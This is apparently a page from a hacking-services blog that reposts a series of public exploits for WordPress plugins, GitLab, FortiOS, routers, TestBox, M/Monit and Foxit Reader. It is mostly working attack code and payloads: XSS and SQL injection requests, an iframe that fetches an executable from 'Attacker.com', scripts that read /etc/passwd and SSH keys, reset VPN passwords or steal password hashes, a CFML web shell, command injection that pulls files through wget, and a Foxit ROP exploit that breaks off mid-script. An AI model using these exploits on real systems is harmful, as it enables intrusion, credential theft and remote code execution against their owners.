Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153529

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
#Exploit Title : Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)
#Exploit Author : ZwX
#Exploit Date : 2020-10-23
#Vendor Homepage : https://wpforms.com/
#Download Plugin : https://downloads.wordpress.org/plugin/wpforms-lite.1.6.3.1.zip


[+] Description Vulnerability:
==============================

A Cross Site Scripting vulnerability is located in the Wordpress plugin [WPForms] which affects version 1.6.3.1 and other versions lower.
To exploit the vulnerability it is necessary to be identified, the attacker could hide JavaScript code without the knowledge of the owner of the site.
 

[+] Proof Of Concept:
=====================

# HTML Code #

<textarea class="" id="wpforms-field-option-0-description" name="fields[0][description]" rows="3"><script>alert(1)</script></textarea>
<textarea class="" id="wpforms-field-option-0-description" name="fields[0][description]" rows="3"><iframe src="https://Attacker.com/putty.exe" style="width:0;height:0;border:0; border:none;/></textarea>


# Methode POST #

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=wpforms-builder&view=fields&form_id=990
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 7081
Origin: http://localhost
Connection: close

action=wpforms_save_form&data=[{"name":"id","value":"990"},{"name":"field_id","value":"5"},{"name":"fields[0][id]","value":"0"},{"name":"fields[0][type]","value":"name"},{"name":"fields[0][label]","value":"Nom"},{"name":"fields[0][format]","value":"first-last"},{"name":"fields[0][description]","value":"<script>alert(1)</script>"},{"name":"fields[0][required]","value":"1"},{"name":"fields[0][size]","value":"medium"},{"name":"fields[0][simple_placeholder]","value":""},{"name":"fields[0][simple_default]","value":""},{"name":"fields[0][first_placeholder]","value":""},{"name":"fields[0][first_default]","value":""},{"name":"fields[0][middle_placeholder]","value":""},{"name":"fields[0][middle_default]","value":""},{"name":"fields[0][last_placeholder]","value":""},{"name":"fields[0][last_default]","value":""},{"name":"fields[0][css]","value":""},{"name":"fields[1][id]","value":"1"},{"name":"fields[1][type]","value":"email"},{"name":"fields[1][label]","value":"E-mail"},{"name":"fields[1][description]","value":""},{"name":"fields[1][required]","value":"1"},{"name":"fields[1][size]","value":"medium"},{"name":"fields[1][placeholder]","value":""},{"name":"fields[1][confirmation_placeholder]","value":""},{"name":"fields[1][default_value]","value":""},{"name":"fields[1][css]","value":""},{"name":"fields[1][filter_type]","value":""},{"name":"fields[1][allowlist]","value":""},{"name":"fields[1][denylist]","value":""},{"name":"fields[2][id]","value":"2"},{"name":"fields[2][type]","value":"textarea"},{"name":"fields[2][label]","value":"Commentaire ou message"},{"name":"fields[2][description]","value":""},{"name":"fields[2][required]","value":"1"},{"name":"fields[2][size]","value":"medium"},{"name":"fields[2][placeholder]","value":""},{"name":"fields[2][limit_count]","value":"1"},{"name":"fields[2][limit_mode]","value":"characters"},{"name":"fields[2][default_value]","value":""},{"name":"fields[2][css]","value":""},{"name":"fields[3][id]","value":"3"},{"name":"fields[3][type]","value":"textarea"},{"name":"fields[3][label]","value":"Paragraphe"},{"name":"fields[3][description]","value":""},{"name":"fields[3][size]","value":"medium"},{"name":"fields[3][placeholder]","value":""},{"name":"fields[3][limit_count]","value":"1"},{"name":"fields[3][limit_mode]","value":"characters"},{"name":"fields[3][default_value]","value":""},{"name":"fields[3][css]","value":""},{"name":"fields[4][id]","value":"4"},{"name":"fields[4][type]","value":"textarea"},{"name":"fields[4][label]","value":"Paragraphe"},{"name":"fields[4][description]","value":""},{"name":"fields[4][size]","value":"medium"},{"name":"fields[4][placeholder]","value":""},{"name":"fields[4][limit_count]","value":"1"},{"name":"fields[4][limit_mode]","value":"characters"},{"name":"fields[4][default_value]","value":""},{"name":"fields[4][css]","value":""},{"name":"settings[form_title]","value":"Formulaire de contact simple"},{"name":"settings[form_desc]","value":""},{"name":"settings[form_class]","value":""},{"name":"settings[submit_text]","value":"Envoyer"},{"name":"settings[submit_text_processing]","value":"Envoi..."},{"name":"settings[submit_class]","value":""},{"name":"settings[antispam]","value":"1"},{"name":"settings[notification_enable]","value":"1"},{"name":"settings[notifications][1][email]","value":"{admin_email}"},{"name":"settings[notifications][1][subject]","value":"Nouvelle entrée : Formulaire de contact simple"},{"name":"settings[notifications][1][sender_name]","value":"Le Blog de ZwX"},{"name":"settings[notifications][1][sender_address]","value":"{admin_email}"},{"name":"settings[notifications][1][replyto]","value":"{field_id=\"1\"}"},{"name":"settings[notifications][1][message]","value":"{all_fields}"},{"name":"settings[confirmations][1][type]","value":"message"},{"name":"settings[confirmations][1][message]","value":"<p>Merci de nous avoir contacté ! Nous vous contacterons rapidement.</p>"},{"name":"settings[confirmations][1][message_scroll]","value":"1"},{"name":"settings[confirmations][1][page]","value":"262"},{"name":"settings[confirmations][1][redirect]","value":""}]&id=990&nonce=ec15a26a5a


# URL Proof Of Concept #

http://localhost/?wpforms_form_preview=990
HireHackking 
# Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS 
# Date: 2020-11-18
# Exploit Author: icekam
# Vendor Homepage: https://www.pescms.com/
# Software Link: https://github.com/lazyphp/PESCMS-TEAM
# Version: PESCMS Team 2.3.2
# CVE:  CVE-2020-28092

PESCMS Team 2.3.2 has multiple reflected XSS via the id

parameter:?g=Team&m=Task&a=my&status=3&id=,?g=Team&m=Task&a=my&status=0&id=,?g=Team&m=Task&a=my&status=1&id=,?g=Team&m=Task&a=my&status=10&id=

 please refer to: https://github.com/lazyphp/PESCMS-TEAM/issues/6

now I input payload :

"><ScRiPt>alert(1)</ScRiPt>
HireHackking 
# Exploit Title: xuucms 3 - 'keywords' SQL Injection
# Date: 2020-11-18
# Exploit Author: icekam
# Vendor Homepage: https://www.cxuu.top/
# Software Link: https://github.com/cbkhwx/cxuucmsv3
# Version: cxuucms - v3
# CVE : CVE-2020-28091

SQL injection exists in search.php. For details, please refer to:
https://github.com/cbkhwx/cxuucmsv3/issues/1

Use SQLMAP authentication:
 sqlmap -u 'http://localhost/search.php?keywords=12345678'
--dbms='MySQL' --level=3 --risk=3 --technique=T --time-sec=3 -o
--batch --user-agent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121
Safari/537.36' -b  --current-db --hostname
HireHackking 
# Exploit Title: Gitlab 12.9.0 - Arbitrary File Read (Authenticated)
# Google Dork: -
# Date: 11/15/2020
# Exploit Author: Jasper Rasenberg
# Vendor Homepage: https://about.gitlab.com
# Software Link: https://about.gitlab.com/install
# Version: tested on gitlab version 12.9.0
# Tested on: Kali Linux 2020.3



#You can create as many personal access tokens as you like from your GitLab profile.
#   Sign in to GitLab.
#    In the upper-right corner, click your avatar and select Settings.
#    On the User Settings menu, select Access Tokens.
#    Choose a name and optional expiry date for the token.
#    Choose the desired scopes.
#    Click the Create personal access token button.
#    Save the personal access token somewhere safe. If you navigate away or refresh your page, and you did not save the token, you must create a new one.

# REFERENCE: https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html

#   pip3 install gitlab
#   pip3 install requests
#   Use a client cert to verify SSL or set to False

import os
import requests
import json
from time import sleep
from gitlab import *

session = requests.Session()
session.verify = f'{os.getcwd()}/<cert.pem>' # or set session.verify = False

host = ''

def exploit(projectName, issueTitle, files, token):

    gl = Gitlab(host, private_token=token, session=session)
    gl.auth()
    p1 = gl.projects.create({'name': f"{projectName}-1"})
    p2 = gl.projects.create({'name': f"{projectName}-2"})

    for i, f in enumerate(files):
        stripped_f = f.rstrip('\n')
        issue = p1.issues.create({ \
                'title': f"{issueTitle}-{i}",
                'description': \
                "![a](/uploads/11111111111111111111111111111111/"\
                f"../../../../../../../../../../../../../..{stripped_f})"})
        print(issue.description)
        sleep(3)
        try:
            issue.move(p2.id)
        except Exception as e:
            pass
        sleep(3)

if __name__ == "__main__":

     write_files = ['/etc/passwd', '~/.ssh/id_rsa']
     with open('senstive_files', 'w') as sens:
         for file in write_files:
             sens.write(file)

    files = list(open('sensitive_files', 'r'))
    exploit('project-1', 'issue-1', files)
HireHackking 
# Exploit Title: Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure
# Date: 17th November 2020
# Exploit Author: Nitesh Surana
# Vendor Homepage: https://www.gxgroup.eu/ont-products/
# Version: P4410-V2-1.34H
# Tested on: Windows/Kali
# CVE : CVE-2020-25988

import upnpy

upnp = upnpy.UPnP()

# Discover UPnP devices on the network
# Returns a list of devices e.g.: [Device <Econet IGD>]
devices = upnp.discover()

# Select the device directly from the list
device = devices[0]

# Get the services available for this device
# Returns a list of services available for the device
# device.get_services()

# We can now access a specific service on the device by its ID like a dictionary 
service = device['DeviceInfo1']

# Execute the action by its name (in our case, the 'X_GetAccess' action)
# Returns a dictionary containing the cleartext password of 'admin' user.
print("Admin Password: {}".format(service.X_GetAccess()['NewX_RootPassword']))
HireHackking 
# Exploit Title: Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification
# Google Dork: intitle:"Please Login" "Use FTM Push"
# Date: 15/11/2020
# Exploit Author: Ricardo Longatto
# Details: This exploit allow change users password from SSLVPN web portal
# Vendor Homepage: https://www.fortinet.com/
# Version: Exploit to Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10.
# Tested on: 6.0.4
# NVD: https://nvd.nist.gov/vuln/detail/CVE-2018-13382
# CVE : CVE-2018-13382
# Credits: Vulnerability by Meh Chang and Orange Tsai.

#!/usr/bin/env python

import requests, urllib3, sys, re, argparse
urllib3.disable_warnings()

menu = argparse.ArgumentParser(description = "[+] Exploit FortiOS Magic backdoor - CVE-2018-13382 [+]")
menu.add_argument('-t', metavar='Target/Host IP', required=True)
menu.add_argument('-p', metavar='Port', required=True)
menu.add_argument('-u', metavar='User', required=True)
menu.add_argument('--setpass', metavar='SetNewPass', default='h4ck3d', help='set the password for user, if you not set, the default password will be set to h4ck3d')
op = menu.parse_args()

host = op.t
port = op.p
user = op.u
setpass = op.setpass

url = "https://"+host+":"+port+"/remote/logincheck"
exploit = {'ajax':'1','username':user,'magic':'4tinet2095866','credential':setpass}
r = requests.post(url, verify=False, data = exploit)

if re.search("/remote/hostcheck_install",r.text):
    print "[+] - The new password to ["+user+"] is "+setpass+" <<<< [+]"
else:
    print "Exploit Failed. :/"
HireHackking 
# Title: TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution
# Author: Darren King
# Date: 2020-07-23
# Vendor Homepage: https://www.ortussolutions.com/products/testbox
# Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0
# Version : 2.4.0 through to 4.1.0
# Tested on: Adobe ColdFusion 11, Adobe ColdFusion 2016, Adobe ColdFusion 2018, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61  

About TestBox
------------------------
TestBox is an open source testing framework for ColdFusion (CFML). It is written and maintained by Ortus Solutions, and can be
downloaded/installed as a stand-alone package as well as being distributed as part of Ortus' ColdBox CFML MVC framework (https://www.coldbox.org/).

TestBox is normally deployed in directories "/testbox" (or "/test") under the root of the corresponding ColdFusion/ColdBox application, 
and allows users to run CFML unit tests and to generate reports.

https://www.ortussolutions.com/products/testbox
https://github.com/Ortus-Solutions/testbox

As per the vendor, TestBox is meant for development & testing purposes only and should not be deployed to production environments.

Command Injection & RCE
------------------------
The file testbox/system/runners/HTMLRunner.cfm is vulnerable to command injection and can be exploited to obtain remote code execution on the remote host.
The block below shows the vulnerable code:

HTMLRunner.cfm, lines 51-73:
// Write TEST.properties in report destination path.
if( url.propertiesSummary ){
	testResult = testbox.getResult();
	errors = testResult.getTotalFail() + testResult.getTotalError();
	savecontent variable="propertiesReport"{
		writeOutput( ( errors ? "test.failed=true" : "test.passed=true" ) & chr( 10 ) );
		writeOutput( "test.labels=#arrayToList( testResult.getLabels() )#
		test.bundles=#URL.bundles#
		test.directory=#url.directory#
		total.bundles=#testResult.getTotalBundles()#
		total.suites=#testResult.getTotalSuites()#
		total.specs=#testResult.getTotalSpecs()#
		total.pass=#testResult.getTotalPass()#
		total.fail=#testResult.getTotalFail()#
		total.error=#testResult.getTotalError()#
		total.skipped=#testResult.getTotalSkipped()#" );
	}

	//ACF Compatibility - check for and expand to absolute path
	if( !directoryExists( url.reportpath ) ) url.reportpath = expandPath( url.reportpath );

	fileWrite( url.reportpath & "/" & url.propertiesFilename, propertiesReport );
}

If the "propertiesSummary" query string parameter is specified, the CFM page will write a properties file to the specified path with a summary of the tests performed.
The reportpath and propertiesFilename values are both supplied as query string parameters and are unvalidated, meaning that the user can supply an arbitrary filename and have the application output
a CFM file (i.e. propertiesFilename=evil.cfm) within the path of the application. 
The user can also specify the "labels" to apply to the test (via the "labels" query string parameter), which are included in the written properties file. Again, these labels are unvalidated and
not sanitized, allowing arbitrary CFML tags and script to be passed to the code. When the properties are output to a CFM file (as per the propertiesFilename parameter), the written CFM
can then be accessed via the browser and any corresponding CFML tags will be executed by the CFML server. 
(Note that Adobe ColdFusion often runs as the System user on Windows, which means it might be possible to achieve remote code execution as System in these circumstances.)

Sample URL to write local CFM file:
http://<HOST>/testbox/system/runners/HTMLRunner.cfm?propertiesSummary=true&reportpath=../runners&propertiesFilename=exec.cfm&labels=<pre><cfexecute name="%23url.cmd%23" arguments="%23url.args%23" timeout="5"></cfexecute></pre>

Sample URL to confirm:
http://<HOST>/testbox/system/runners/exec.cfm?cmd=whoami&args=/all

Versions Affected
------------------------
Versions affected (and platform tested on):
  - Testbox-4.1.0+384-202005272329 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61)
  - Testbox-3.1.0+339-201909272036 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
  - Testbox-3.0.0+309-201905040706 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
  - Testbox-2.5.0+107-201705171812 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
  - Testbox-2.4.0+80-201612030044  (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
  
Timeline
------------------------
2020-07-23 - Reserved CVEs
2020-08-04 - Disclosed issues to vendor
2020-08-04 - Response from vendor - not an issue. TestBox is a testing framework and is not meant to be deployed in production.
HireHackking 
# Title: TestBox CFML Test Framework 4.1.0 - Directory Traversal
# Author: Darren King
# Date: 2020-07-23
# Vendor Homepage: https://www.ortussolutions.com/products/testbox
# Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0
# Version : 2.3.0 through to 4.1.0
# Tested on: Adobe ColdFusion 11, Adobe ColdFusion 2016, Adobe ColdFusion 2018, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61 

About TestBox
------------------------
TestBox is an open source testing framework for ColdFusion (CFML). It is written and maintained by Ortus Solutions, and can be
downloaded/installed as a stand-alone package as well as being distributed as part of Ortus' ColdBox CFML MVC framework (https://www.coldbox.org/).

TestBox is normally deployed in directories "/testbox" (or "/test") under the root of the corresponding ColdFusion/ColdBox application, 
and allows users to run CFML unit tests and to generate reports.

https://www.ortussolutions.com/products/testbox
https://github.com/Ortus-Solutions/testbox

As per the vendor, TestBox is meant for development & testing purposes only and should not be deployed to production environments.

Directory Traversal
------------------------
The TestBox "test-browser" page does not adequately sanitise the "path" QueryString parameter, allowing an attacker
to perform a directory traversal on the page by specifying the value "path=/../" (appending '../' all the way up to the
system root).

Sample URL:
http://<HOST>/testbox/test-browser/index.cfm?path=/../

Versions Affected
------------------------
Versions affected (and platform tested on):
  - Testbox-4.1.0+384-202005272329 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61)
  - Testbox-3.1.0+339-201909272036 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
  - Testbox-3.0.0+309-201905040706 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
  - Testbox-2.5.0+107-201705171812 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
  - Testbox-2.4.0+80-201612030044  (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
  
Timeline
------------------------
2020-07-23 - Reserved CVEs
2020-08-04 - Disclosed issues to vendor
2020-08-04 - Response from vendor - not an issue. TestBox is a testing framework and is not meant to be deployed in production.
HireHackking 
# Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection 
# Date: 13/09/2020                                         
# Exploit Author: Gabriele Zuddas                         
# Version: 01.01.02.127, 01.01.02.141                      
# CVE : CVE-2020-24365                                     


Service Provider : 	Linkem
Product Name : 	LTE CPE
Model ID : 	WVRTM-127ACN
Serial ID :	GMK170418011089
IMEI : 	XXXXXXXXXXXXX
ICCID : 	XXXXXXXXXXXXXXXXXX
Firmware Version : 	01.01.02.141
Firmware Creation Date : 	May 15 13:04:30 CST 2019
Bootrom Version : 	U-Boot 1.1.3
Bootrom Creation Date : 	Oct 23 2015 - 16:03:05
LTE Support Band : 	42,43


Injecting happens here:

sh -c (ping -4 -c 1 -s 4 -W 1 "INJECTION" > /tmp/mon_diag.log 2>&1; cmscfg -s -n mon_diag_status -v 0)&


Exploit has been tested on older verions too:
    Firmware Version: 	01.01.02.127
    Firmware Creation Date : 	May 23 15:34:10 CST 2018

"""

import requests, time, argparse, re, sys

class Exploit():
    
    CVE = "CVE-2020-24365"
    
    def __init__(self, args):
        self.args = args
        self.session = requests.Session()
    
    def login(self):
        s = self.session
        r = s.post(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=login.asp&action=login", data={"user_name":self.args.username,"user_passwd":self.args.password})
        if "sid" not in s.cookies:
            print("[!] Login failed.")
            exit(1)
        sid = s.cookies["sid"]
        s.headers = {"sid": sid}
        print(f"[*] Login successful! (sid={sid})")
    
    def now(self):
        return int(time.time() * 1000)

    def exploit(self, command):
        self.login()
        
        with self.session as s:
            payload = f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=$({command};)&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1&mon_tracert_hops=&mon_diag_protocol_type=4&time={self.now()}&_={self.now()}"
            
            r = s.get(payload)
            r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}")
            content = str(r.content, "utf8")

            #Attempt to stop the command as some commands tend to get stuck (if commands stop working check on the web interface)
            r = s.get(payload)
            r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}")
            content = str(r.content, "utf8")
            
            #TODO: eventually parse content with regex to clean out the output
            c = re.findall(r"(?<=ping: bad address \')(.*)(?=\')", content)
            print(content)
            print(c[0])
            
            if len(c) > 0:
                return c[0]
            else:
                return False

    def download_file(self, url):
        filename = url.rsplit('/', 1)[-1]
        
        if self.args.file is not None:
            print(f"[*] Attempting download of file '{filename}' from {url} ...")
    
            if self.exploit(f"wget {url} -O /tmp/{filename}"):
                print(f"[*] File saved on {self.args.target}'s /tmp/{filename}.")
                print(self.exploit(f"du -h /tmp/{filename}"))
                return True
            else:
                print(f"[!] Failed to download {filename} from {url}")
                return False

    def run(self):
        if self.args.command is not None:
            print(self.exploit(self.args.command))
            exit()
        if self.args.file is not None:
            self.download_file(self.args.file)
            exit()

if __name__ == "__main__":
    # Create the parser and add arguments
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", dest="target", default="192.168.1.1", help="Vulnerable target")
    parser.add_argument("-u", "--username", dest="username", default="admin", help="Valid username to use")
    parser.add_argument("-p", "--password", dest="password", default="admin", help="Valid password to use")
    parser.add_argument("-c", "--command", dest="command", default=None, help="Command to execute")
    
    parser.add_argument("-D", "--download-file", dest="file", default=None, help="Download file on target's /tmp directory")

    args = parser.parse_args()

    # Run exploit
    X = Exploit(args)
    if len(sys.argv) > 1:
        print(f"[*] Exploiting {X.CVE} ...")
        X.run()
    else:
        parser.print_help(sys.stderr)
HireHackking 
# Title: M/Monit 3.7.4 - Privilege Escalation
# Author: Dolev Farhi
# Date: 2020-07-09
# Vendor Homepage: https://mmonit.com/
# Version : 3.7.4

import sys
import requests

url = 'http://your_ip_here:8080'
username = 'test'
password = 'test123'

sess = requests.Session()
sess.get(host)

def login():
  print('Attempting to login...')
  data = {
    'z_username':username,
    'z_password':password
  }
  headers = {
    'Content-Type':'application/x-www-form-urlencoded'
  }
  
  resp = sess.post(url + '/z_security_check', data=data, headers=headers)
  if resp.ok:
    print('Logged in successfully.')
  else:
    print('Could not login.')
    sys.exit(1)

def privesc():
  data = {
    'uname':username,
    'fullname':username,
    'password':password,
    'admin':1
  }
  resp = sess.post(url + '/api/1/admin/users/update', data=data)
  
  if resp.ok:
    print('Escalated to administrator.')
  else:
    print('Unable to escalate to administrator.')
  
  return

if __name__ == '__main__':
  login()
  privesc()
HireHackking 
# Title: M/Monit 3.7.4 - Password Disclosure
# Author: Dolev Farhi
# Date: 2020-07-09
# Vendor Homepage: https://mmonit.com/
# Version : 3.7.4

import sys
import requests

url = 'http://your_ip_here:8080'
username = 'test'
password = 'test123'

sess = requests.Session()
sess.get(host)

def login():
  print('Attempting to login...')
  data = {
    'z_username':username,
    'z_password':password
  }
  headers = {
    'Content-Type':'application/x-www-form-urlencoded'
  }
  
  resp = sess.post(url + '/z_security_check', data=data, headers=headers)
  if resp.ok:
    print('Logged in successfully.')
  else:
    print('Could not login.')
    sys.exit(1)

def steal_hashes():
  resp = sess.get(url + '/api/1/admin/users/list')
  if resp.ok:
    for i in resp.json():
      mmonit_user = i['uname']
      result = sess.get(url + '/api/1/admin/users/get?uname={}'.format(mmonit_user))
      mmonit_passw = result.json()['password']
      print('Stolen MD5 hash. User: {}, Hash: {}'.format(mmonit_user, mmonit_passw))
    
if __name__ == '__main__':
  login()
  steal_hashes()
HireHackking 
# Exploit Title: Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)
# Exploit Author: SunCSR (Sun* Cyber Security Research) - Nguyen Khang
# Google Dork: N/A
# Date: 2020-08-24
# Vendor Homepage: https://accesspressthemes.com
# Software Link: https://wordpress.org/plugins/accesspress-social-icons/
# Version: <= 1.7.9
# Tested on: Ubuntu 18.04

Description:
A blind SQL injection vulnerability is present in Ajax load more.

<?php
$si_id = esc_attr($atts['id']);
global $wpdb;
$table_name = $table_name = $wpdb->prefix . "aps_social_icons";
$icon_sets = $wpdb->get_results("SELECT * FROM $table_name where si_id =
$si_id");

POC:
POST /wordpress/index.php?rest_route=%2Fwp%2Fv2%2Fposts%2F66&_locale=user
HTTP/1.1
Host: pwnme.me
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101
Firefox/79.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://pwnme.me/wordpress/wp-admin/post.php?post=66&action=edit
X-WP-Nonce: 514cd2ab3f
X-HTTP-Method-Override: PUT
Content-Type: application/json
Origin: http://pwnme.me
Content-Length: 103
Connection: close
Cookie: wp-settings-time-2=1597912773;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=author%7C1598405206%7Cwp7Nu56SQz9nIWmkqZr94WFIpGZ6VfcTT5KaYPUULWe%7C3c4c3a80cbfd049b95b04a6104ded9b05f33f8a9900ccec818d5aa43c7102c79;
wp-settings-time-3=1598234126

{"id":66,"content":"<!-- wp:shortcode -->\n[aps-social id=\"4 and
sleep(5)\"]\n<!-- /wp:shortcode -->"}
HireHackking 
# Exploit Title: Nagios Log Server 2.1.7 - 'snapshot_name' Persistent Cross-Site Scripting
# Date: 31.08.2020
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://www.nagios.com/
# Software Link: https://www.nagios.com/products/nagios-log-server/
# Version: 2.1.7
# Tested on: Linux/ISO

# Link:
https://github.com/EmreOvunc/Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting

# Description

A stored cross-site scripting (XSS) in Nagios Log Server 2.1.7 can result
in an attacker performing malicious actions to users who open a maliciously
crafted link or third-party web page.

# PoC

To exploit vulnerability, someone could use a POST request to
'/nagioslogserver/configure/create_snapshot' by manipulating
'snapshot_name' parameter in the request body to impact users who open a
maliciously crafted link or third-party web page.

POST /nagioslogserver/configure/create_snapshot HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0)
Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
DNT: 1
Connection: close
Cookie: csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd;
ls_session=883lergotgcjbh9bjgaeakosv5go2gbb;
PHPSESSID=nbah0vkmibpudd1qh7qgnpgo53
Upgrade-Insecure-Requests: 1

csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd&snapshot_name=[XSS_PAYLOAD]
HireHackking 
# Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution
# Date: 2020-08-29
# Exploit Author: CrossWire
# Vendor Homepage: https://www.foxitsoftware.com/
# Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
# Version: 9.0.1.1049
# Tested on: Microsoft Windows Server 2016 10.0.14393
# CVE : [2018-9958](https://nvd.nist.gov/vuln/detail/CVE-2018-9958)

#!/usr/bin/python3

'''
===========================================================================
|   PDF generator for Foxit Reader Remote Code Execution (CVE 2018-9958)  |  
===========================================================================
| Written by: Kevin Dorland (CrossWire)                                   |
| Date: 08/29/2020                                                        |
|                                                                         |
| Exploit originally discovered by Steven Seeley (mr_me) of Source Incite |
|                                                                         |
| References:                                                             |
|   https://www.exploit-db.com/exploits/44941 (Steven Seely Calc.exe PoC) |
|   https://www.exploit-db.com/exploits/45269 (Metasploit adaptation)     |
|                                                                         |
===========================================================================
'''


PDF_TEMPLATE = '''
%PDF
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>>
2 0 obj
<</S /JavaScript /JS (

var heap_ptr   = 0;
var foxit_base = 0;
var pwn_array  = [];

function prepare_heap(size){
    var arr = new Array(size);
    for(var i = 0; i < size; i++){
        arr[i] = this.addAnnot({type: "Text"});;
        if (typeof arr[i] == "object"){
            arr[i].destroy();
        }
    }
}

function gc() {
    const maxMallocBytes = 128 * 0x100000;
    for (var i = 0; i < 3; i++) {
        var x = new ArrayBuffer(maxMallocBytes);
    }
}

function alloc_at_leak(){
    for (var i = 0; i < 0x64; i++){
        pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
    }
}

function control_memory(){
    for (var i = 0; i < 0x64; i++){
        for (var j = 0; j < pwn_array[i].length; j++){
            pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
        }
    }
}

function leak_vtable(){
    var a = this.addAnnot({type: "Text"});

    a.destroy();
    gc();

    prepare_heap(0x400);
    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);

    var leaked = stolen[0] & 0xffff0000;
    foxit_base = leaked - 0x01f50000;
}

function leak_heap_chunk(){
    var a = this.addAnnot({type: "Text"});
    a.destroy();
    prepare_heap(0x400);

    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);

    alloc_at_leak();
    heap_ptr = stolen[1];
}

function reclaim(){
    var arr = new Array(0x10);
    for (var i = 0; i < arr.length; i++) {
        arr[i] = new ArrayBuffer(0x60);
        var rop = new Int32Array(arr[i]);

        rop[0x00] = heap_ptr;                // pointer to our stack pivot from the TypedArray leak
        rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
        rop[0x02] = 0x72727272;              // junk
        rop[0x03] = foxit_base + 0x00001450  // pop ebp; ret
        rop[0x04] = 0xffffffff;              // ret of WinExec
        rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
        rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
        rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
        rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
        rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
        rop[0x0a] = foxit_base + 0x0041c6ca; // ret
        rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
        
        //Path to executable

<PATH TO EXECUTABLE>
        
        //End Path to executable

        rop[0x17] = 0x00000000;              // adios, amigo
    }
}

function trigger_uaf(){
    var that = this;
    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
    var arr = [1];
    Object.defineProperties(arr,{
        "0":{
            get: function () {

                that.getAnnot(0, "uaf").destroy();

                reclaim();
                return 1;
            }
        }
    });

    a.point = arr;
}

function main(){
    leak_heap_chunk();
